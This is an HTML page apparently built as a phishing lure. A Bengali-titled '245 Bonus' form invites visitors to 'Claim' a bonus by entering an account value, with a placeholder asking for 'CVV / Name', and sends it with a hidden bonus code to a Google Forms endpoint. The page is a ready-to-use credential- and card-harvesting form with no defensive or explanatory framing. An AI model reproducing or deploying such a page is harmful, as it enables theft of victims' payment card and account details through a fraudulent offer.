<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>245 Bonus</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f4f4f4;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
            background-image: url('bg.jpg');
        }
        .form-container {
            background-color: #fff;
            padding: 20px 40px;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
            border-radius: 10px;
            width: 300px;
        }
        .form-container h2 {
            text-align: center;
            margin-bottom: 20px;
            font-weight: bold;
             background: linear-gradient(110.7deg, rgb(255, 81, 47) 1.7%, rgb(255, 167, 47) 8.2%, rgb(122, 59, 202) 16.2%, rgb(18, 51, 233) 23.4%, rgb(69, 193, 42) 32.8%, rgb(231, 7, 249) 43.7%, rgb(6, 200, 217) 55.3%, rgb(18, 51, 233) 65.5%, rgb(122, 59, 202) 74.5%, rgb(231, 7, 249) 82.3%, rgb(202, 59, 163) 91.4%); 
    -webkit-background-clip: text;
  -webkit-text-fill-color: transparent;
        
        }
        .form-container label {
            display: block;
            margin-bottom: 8px;
            font-weight: bold;
        }
        .form-container input[type="tel"] {
            width: 100%;
            padding: 10px;
            margin-bottom: 20px;
            border: 1px solid #ccc;
            border-radius: 5px;
        }
        
        .form-container input[type="submit"] {
            width: 50%;
            padding: 10px;
            background-color: #eb3480;
            border: none;
            border-radius: 25px;
            color: white;
            font-size: 16px;
            cursor: pointer;
            display: block;
            margin: 0 auto;
        }
        .form-container input[type="submit"]:hover {
            background-color: #45a049;
        }
    </style>
</head>
<body>
    <div class="form-container">
        <h2>দুই-চার-পাচঁ</h2>
        <form action="https://docs.google.com/forms/u/0/d/e/1FAIpQLScVz3veBlhP7zYsKPa5gem4u_H2bqftYiICVXON30VjxWMJOw/formResponse" method="get" target="_blank">
            <label for="username">Account</label>
            <input type="tel" id="username" name="entry.31441046" placeholder="CVV / Name"required>
            <label for="bonuscode"></label>
            <input type="hidden" id="bonuscode" name="entry.1545135281" value="100upc"required>
            <input type="submit" value="Claim">
        </form>
    </div>
</body>
</html>
